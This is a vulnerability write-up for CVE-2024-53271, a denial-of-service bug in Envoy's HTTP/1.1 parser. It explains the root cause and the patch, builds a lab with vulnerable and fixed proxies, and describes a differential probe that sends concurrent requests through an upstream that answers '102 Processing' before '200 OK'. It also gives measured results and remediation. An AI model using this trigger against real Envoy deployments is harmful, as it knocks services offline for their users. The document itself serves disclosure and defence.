CVE-2024-53271: Envoy BALSA Parser Double-MessageDone() DoS
Published 2026-06-06
Summary
A logic error in Envoy's HTTP/1.1 BALSA parser causes MessageDone() to be called twice for the same stream when the upstream sends a non-101 1xx intermediate response. This corrupts connection state and causes a significant fraction of downstream requests to fail with stream-reset errors, producing an unauthenticated, remotely-triggered availability impact.
| Field | Value |
|---|---|
| Project | Envoy Proxy |
| Affected component | source/common/http/http1/balsa_parser.cc — BalsaParser::MessageDone() |
| Severity | HIGH |
| CVSS | AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H (v3.1, score 7.1) |
| CWE | CWE-670 |
| Affected versions | 1.31.0 – 1.31.4, 1.32.0 – 1.32.2 |
| Fixed version | 1.31.5, 1.32.3 |
| Advisory | GHSA-rmm5-h2wv-mg4f |
1. Vulnerability Overview
Envoy Proxy is a high-performance edge and service proxy written in C++. Since roughly version 1.26, Envoy has used the BALSA HTTP/1.1 parser by default. CVE-2024-53271 is a control-flow defect in BALSA that an attacker can trigger by arranging for an upstream HTTP/1.1 server to send a non-101 1xx intermediate response (e.g. 102 Processing) before the final response. When the runtime feature flag envoy.reloadable_features.http1_balsa_delay_reset is enabled (the default in all affected versions), the bug causes MessageDone() to fire twice on the same stream, corrupting Envoy's per-stream parser state. A large fraction of downstream client requests then terminate abnormally with stream-reset or connection errors: roughly 65% in typical conditions, and 96–100% at high concurrency in the reproduction.
Root cause. In source/common/http/http1/balsa_parser.cc, the BalsaParser::MessageDone() function is supposed to finalize a single HTTP message by calling connection_->onMessageComplete(). For 1xx responses, which have no body, the BALSA parser progresses through HeaderDone() directly to MessageDone(). This first invocation resets first_byte_processed_ to false. When the final response (e.g. 200 OK) subsequently arrives, MessageDone() is called a second time. The guard at the top of the function checked only for ParserStatus::Error and therefore allowed both invocations to call onMessageComplete(), corrupting connection and stream state.
The patch makes MessageDone() idempotent by adding an early-return condition:
// Patch to BalsaParser::MessageDone(): "-" lines are removed, "+" lines are added
 void BalsaParser::MessageDone() {
-  if (status_ == ParserStatus::Error) {
+  if (status_ == ParserStatus::Error ||
+      // In the case of early 1xx, MessageDone() can be called twice in a row.
+      // The !first_byte_processed_ check is to make this function idempotent.
+      (wait_for_first_byte_before_msg_done_ && !first_byte_processed_)) {
     return;
   }
   status_ = convertResult(connection_->onMessageComplete());
The patch also introduces a new runtime guard, envoy.reloadable_features.wait_for_first_byte_before_balsa_msg_done. When enabled (the new default in fixed versions), the second MessageDone() invocation for a 1xx-then-final exchange returns early because first_byte_processed_ is false after the first invocation, skipping the damaging second call to onMessageComplete().
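The effect of the guard can be illustrated with a toy model. The sketch below is not Envoy code: `ToyParser`, `feed_first_byte()`, and the `completions` counter are hypothetical stand-ins, and the only behavior taken from the text above is that `MessageDone()` can run twice in a row and that the first run resets `first_byte_processed_` to false.

```python
class ToyParser:
    """Toy stand-in for the MessageDone() guard; not Envoy's implementation."""

    def __init__(self, wait_for_first_byte: bool) -> None:
        # Models wait_for_first_byte_before_msg_done_ (the new runtime guard).
        self.wait_for_first_byte = wait_for_first_byte
        self.first_byte_processed = False
        self.error = False
        # Counts simulated onMessageComplete() calls.
        self.completions = 0

    def feed_first_byte(self) -> None:
        """Hypothetical hook: the first byte of a message has been parsed."""
        self.first_byte_processed = True

    def message_done(self) -> None:
        # Patched guard: bail out on error, or when no byte has been seen
        # since the previous completion (only if the guard is enabled).
        if self.error or (self.wait_for_first_byte and not self.first_byte_processed):
            return
        self.completions += 1
        # The first invocation resets the flag, as described above.
        self.first_byte_processed = False


def completions_for_back_to_back_calls(wait_for_first_byte: bool) -> int:
    """Simulate MessageDone() firing twice in a row for one message."""
    parser = ToyParser(wait_for_first_byte)
    parser.feed_first_byte()
    parser.message_done()
    parser.message_done()  # second call, no new bytes in between
    return parser.completions
```

With the guard disabled the model counts two completions for one message; with it enabled the second call is a no-op and the count stays at one.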
2. Vulnerable Environment
The reproduction runs entirely in Docker using Envoy's official prebuilt images; no source build is required. Four containers share a single bridge network (cve-2024-53271-net):
| Container | Role | Image | Host port |
|---|---|---|---|
| cve-2024-53271-envoy-vuln | Vulnerable proxy | envoyproxy/envoy:v1.32.2 | 127.0.0.1:10000 (downstream), 127.0.0.1:9900 (admin) |
| cve-2024-53271-envoy-baseline | Fixed baseline proxy | envoyproxy/envoy:v1.32.3 | 127.0.0.1:10001 (downstream), 127.0.0.1:9901 (admin) |
| cve-2024-53271-upstream-102 | Triggering upstream | custom (cve-2024-53271-upstream:local) | internal only |
| cve-2024-53271-upstream-plain | Liveness upstream (no 1xx) | custom (cve-2024-53271-upstream:local) | internal only |
Each proxy exposes two routes on its single :10000 listener:
- GET|HEAD /trigger: routes to upstream-102, which responds with a raw 102 Processing frame followed by 200 OK. This is the path that fires the bug on the vulnerable proxy.
- GET|HEAD /plain: routes to upstream-plain, which responds with 200 OK only (no 1xx). This path serves as a liveness check to confirm the proxy is healthy independently of the bug.
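The two upstream behaviors described above can be sketched with a raw socket server. This is an illustrative stand-in, not the contents of env/config/upstream.py: the function names, the `ok` body, and the `Connection: close` header are assumptions made for the example.

```python
import socket


def build_response(send_interim: bool, method: str = "GET") -> bytes:
    """Return the raw bytes the upstream writes for one request."""
    body = b"ok\n"  # placeholder body, chosen for the example
    head = (
        "HTTP/1.1 200 OK\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")
    # HEAD responses carry headers only.
    final = head if method == "HEAD" else head + body
    # The 102 frame is a bare status line plus the blank line ending its headers.
    interim = b"HTTP/1.1 102 Processing\r\n\r\n" if send_interim else b""
    return interim + final


def serve(host: str, port: int, send_interim: bool) -> None:
    """Answer every connection with one response, then close it."""
    with socket.create_server((host, port)) as server:
        while True:
            conn, _ = server.accept()
            with conn:
                request = conn.recv(65536)
                method = request.split(b" ", 1)[0].decode("ascii", "replace") or "GET"
                conn.sendall(build_response(send_interim, method))
```

Under these assumptions, `serve("0.0.0.0", 8080, True)` would play the role of upstream-102 and `serve("0.0.0.0", 8080, False)` the role of upstream-plain; the port is arbitrary.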
The vulnerable proxy (envoy-vuln) is configured in env/config/envoy-vuln.yaml with the two triggering runtime flags explicitly set:
layered_runtime:
  layers:
  - name: static_layer
    static_layer:
      envoy.reloadable_features.http1_balsa_delay_reset: true
      envoy.reloadable_features.wait_for_first_byte_before_balsa_msg_done: false
The baseline proxy (envoy-baseline) runs envoyproxy/envoy:v1.32.3 and has both flags set in the opposite direction (http1_balsa_delay_reset: false, wait_for_first_byte_before_balsa_msg_done: true). Its listener, route, and cluster configuration is otherwise byte-identical to the vulnerable proxy, which is what makes the differential meaningful.
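Before probing, it can be useful to confirm that each proxy really loaded the intended flag values. The sketch below assumes the Envoy admin interface exposes a `/runtime` endpoint returning JSON with an `entries` map whose values carry a `final_value` string; the helper names are hypothetical, and flags that no runtime layer overrides are assumed to be absent from the output.

```python
import json
from urllib.request import urlopen

FLAGS = (
    "envoy.reloadable_features.http1_balsa_delay_reset",
    "envoy.reloadable_features.wait_for_first_byte_before_balsa_msg_done",
)


def effective_flags(runtime_doc: dict, names=FLAGS) -> dict:
    """Map each flag name to its final runtime value, or None if not listed."""
    entries = runtime_doc.get("entries", {})
    return {name: entries.get(name, {}).get("final_value") for name in names}


def fetch_runtime(admin_base: str) -> dict:
    """Fetch the runtime dump from an admin base URL such as http://127.0.0.1:9900."""
    with urlopen(f"{admin_base}/runtime", timeout=5) as resp:
        return json.load(resp)
```

For example, `effective_flags(fetch_runtime("http://127.0.0.1:9900"))` would be expected to report `"true"` and `"false"` for the vulnerable proxy if the static layer shown above was applied.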
The environment files are available as env.zip. Individual files: env/Dockerfile, env/docker-compose.yml, env/config/envoy-vuln.yaml, env/config/envoy-baseline.yaml, env/config/upstream.py.
To stand up the environment:
Confirm the stack is healthy before running the exploit (all four responses must be 200):
docker compose -f env/docker-compose.yml ps
curl -s -o /dev/null -w "vuln admin: %{http_code}\n" http://127.0.0.1:9900/ready
curl -s -o /dev/null -w "baseline admin: %{http_code}\n" http://127.0.0.1:9901/ready
curl -s -o /dev/null -w "vuln /plain: %{http_code}\n" http://127.0.0.1:10000/plain
curl -s -o /dev/null -w "baseline /plain: %{http_code}\n" http://127.0.0.1:10001/plain
Verify the exact image versions:
docker exec cve-2024-53271-envoy-vuln envoy --version # .../1.32.2/...
docker exec cve-2024-53271-envoy-baseline envoy --version # .../1.32.3/...
3. How to Exploit
The exploit is a differential probe: it sends concurrent HTTP/1.1 requests to both the vulnerable and fixed proxy over the /trigger path (which routes to the 102-responding upstream) and measures what fraction of requests reach clean end-of-stream. No special privilege is required; any unauthenticated downstream client will suffice.
The exploit scripts are available as exploit.zip. Individual files: exploit/run.sh, exploit/probe.py.
Step 1. Confirm the environment is up and healthy (four 200s, as shown in §2 above).
Step 2. Run the exploit script:
The arguments are: vulnerable proxy host, vulnerable proxy port, baseline proxy host, baseline proxy port, trigger path, liveness path, probe count (50 requests per configuration per path), and concurrency (20 in-flight probes at a time). The script runs a liveness pre-check on both proxies via /plain, then fires 50 concurrent /trigger probes at each proxy, reads the raw downstream HTTP/1.1 bytes, classifies each response as clean or abnormal, and prints a per-configuration clean-completion rate. It also reads Envoy's own admin stats at :9900 and :9901 as independent corroboration.
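The classification step can be sketched as follows. This is not the actual probe.py: it is a simplified classifier that only inspects status lines, skips any non-101 1xx interim responses that reach the client, and does not validate body length. The `empty-response` and `bad-status-line` labels mirror the ones quoted in this write-up; `truncated-headers` and `missing-final-response` are hypothetical labels added for the example.

```python
def classify(raw: bytes) -> str:
    """Classify raw downstream bytes as 'clean' or name the abnormality."""
    if not raw:
        return "empty-response"
    rest = raw
    while True:
        # Split one header block off the front of the remaining bytes.
        head, sep, rest = rest.partition(b"\r\n\r\n")
        status_line = head.split(b"\r\n", 1)[0]
        parts = status_line.split(b" ", 2)
        well_formed = (
            len(parts) >= 2
            and parts[0].startswith(b"HTTP/1.")
            and len(parts[1]) == 3
            and parts[1].isdigit()
        )
        if not well_formed:
            return f"bad-status-line: {status_line!r}"
        if not sep:
            return "truncated-headers"
        code = int(parts[1])
        if 100 <= code < 200 and code != 101:
            # Interim response: a final response must still follow.
            if not rest:
                return "missing-final-response"
            continue
        return "clean"
```

A production probe would also check `Content-Length` or chunked framing against the bytes received; this sketch stops at the final status line.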
What proves it worked. The evidence that the bug fired comes from two independent observations, neither of which is the exploit's own stdout claim.
First, the exploit script classifies each probe by reading raw downstream wire bytes and checking whether the response is a well-formed HTTP message with a valid final status line. On the vulnerable proxy, the corrupted parser emits framing that the script reports as bad-status-line: b'0' or empty-response (stream reset / decoder reset): garbled bytes produced by Envoy after MessageDone() runs twice. This is observed from the perspective of the downstream client, not authored by the exploit.
Second, Envoy's own admin stats endpoint (/stats) tracks http.ingress_http.downstream_rq_completed and downstream_rq_total independently of any client. After the reproduction runs, these counters confirm the failure:
VULN: http.ingress_http.downstream_rq_completed: 51 / downstream_rq_total: 101
BASELINE: http.ingress_http.downstream_rq_completed: 101 / downstream_rq_total: 101
On the vulnerable proxy, only 51 of 101 requests (the 50 liveness /plain probes plus one completion from the /trigger batch) reached clean completion according to Envoy's own internal counter; the remaining 50 /trigger probes never completed. On the fixed proxy, completed equals total.
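The counter comparison can be automated with a small parser for the plain-text `name: value` lines that the admin `/stats` endpoint returns. The helper names below are hypothetical, and the `http.ingress_http` prefix is taken from the counters quoted above.

```python
def parse_stats(text: str) -> dict:
    """Parse 'name: value' lines, keeping only integer-valued stats."""
    stats = {}
    for line in text.splitlines():
        name, sep, value = line.partition(": ")
        # Histogram lines and other non-integer values are skipped.
        if sep and value.strip().isdigit():
            stats[name.strip()] = int(value)
    return stats


def completion_gap(stats: dict, prefix: str = "http.ingress_http") -> int:
    """Return how many requests were counted as started but not completed."""
    total = stats[f"{prefix}.downstream_rq_total"]
    completed = stats[f"{prefix}.downstream_rq_completed"]
    return total - completed
```

Applied to the counters shown above, the gap is 50 for the vulnerable proxy and 0 for the baseline.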
The observed output from two successive runs:
# Run 1
RESULT VULN-LIVENESS: clean=50 failed=0 total=50 clean_rate=100.0%
RESULT BASELINE-LIVENESS: clean=50 failed=0 total=50 clean_rate=100.0%
RESULT VULN-TRIGGER: clean=0 failed=50 total=50 clean_rate=0.0% (all "bad-status-line: b'0'")
RESULT BASELINE-TRIGGER: clean=50 failed=0 total=50 clean_rate=100.0%
# Run 2 (reproducibility)
RESULT VULN-LIVENESS: clean=50 failed=0 total=50 clean_rate=100.0%
RESULT BASELINE-LIVENESS: clean=50 failed=0 total=50 clean_rate=100.0%
RESULT VULN-TRIGGER: clean=2 failed=48 total=50 clean_rate=4.0%
RESULT BASELINE-TRIGGER: clean=50 failed=0 total=50 clean_rate=100.0%
The liveness path (/plain, no 1xx upstream) completes cleanly at 100% on both proxies in every run, confirming that the proxy infrastructure is healthy and that the failure is specific to the 1xx-then-final trigger. The /trigger path on the fixed proxy also completes at 100%, establishing that the patched build handles the same upstream sequence correctly. Only the vulnerable build with the triggering flags set collapses to 0–4% clean completion, which points to the CVE rather than an environment artifact as the cause.
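The differential argument above can be expressed as a check over the RESULT lines. The sketch assumes the output format shown in the two runs; the function names and the 50% threshold for the vulnerable trigger path are illustrative choices, not part of the exploit scripts.

```python
import re

RESULT_RE = re.compile(
    r"RESULT (?P<name>[A-Z-]+): clean=(?P<clean>\d+) "
    r"failed=(?P<failed>\d+) total=(?P<total>\d+)"
)


def clean_rates(output: str) -> dict:
    """Map each configuration name to its clean-completion rate (0.0 to 1.0)."""
    rates = {}
    for match in RESULT_RE.finditer(output):
        total = int(match["total"])
        rates[match["name"]] = int(match["clean"]) / total if total else 0.0
    return rates


def differential_holds(rates: dict, max_vuln_rate: float = 0.5) -> bool:
    """True when only the vulnerable trigger path degrades."""
    return (
        rates.get("VULN-LIVENESS") == 1.0
        and rates.get("BASELINE-LIVENESS") == 1.0
        and rates.get("BASELINE-TRIGGER") == 1.0
        and rates.get("VULN-TRIGGER", 1.0) <= max_vuln_rate
    )
```

Requiring 100% on both liveness paths and on the baseline trigger path is what rules out a generally unhealthy environment as the explanation.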
Teardown. When finished, stop and remove all containers and volumes:
4. Security Advice
Remediation. Upgrade to Envoy 1.31.5 or 1.32.3. These releases introduce the envoy.reloadable_features.wait_for_first_byte_before_balsa_msg_done runtime guard (enabled by default) that makes MessageDone() idempotent, preventing the second invocation from calling onMessageComplete() again for a stream that already completed its 1xx phase.
Workaround. If an immediate upgrade is not possible, set the runtime feature envoy.reloadable_features.http1_balsa_delay_reset to false in the layered runtime configuration. This disables the delayed-reset behavior that is the prerequisite for the double MessageDone() invocation. This flag may have functional trade-offs; consult the release notes and the advisory before deploying the workaround in production.
Scope. The bug only affects HTTP/1.1 traffic handled by the BALSA parser (the default since ~1.26) on paths where the upstream can send a non-101 1xx response. HTTP/2 and HTTP/3 connections are not affected. The CVSS UI:R component reflects that an attacker needs to arrange a 1xx-emitting upstream; in a service-mesh context, a compromised or attacker-controlled upstream service provides that capability.
References.
- NVD, CVE-2024-53271: CWE, CVSS, affected and fixed versions, publication date.
- GHSA-rmm5-h2wv-mg4f (GitHub Security Advisory): full advisory, mitigation guidance, credits.
- Patch commit da56f6da (envoyproxy/envoy): authoritative diff with the balsa_parser.cc idempotency guard, new runtime feature flag, and integration tests.
- BUseclab/cve-genie, exploit.py: concurrent HEAD request PoC script.
- livecvebench/CVE-Factory, solution.sh + entrypoint.sh: full reproduction environment reference.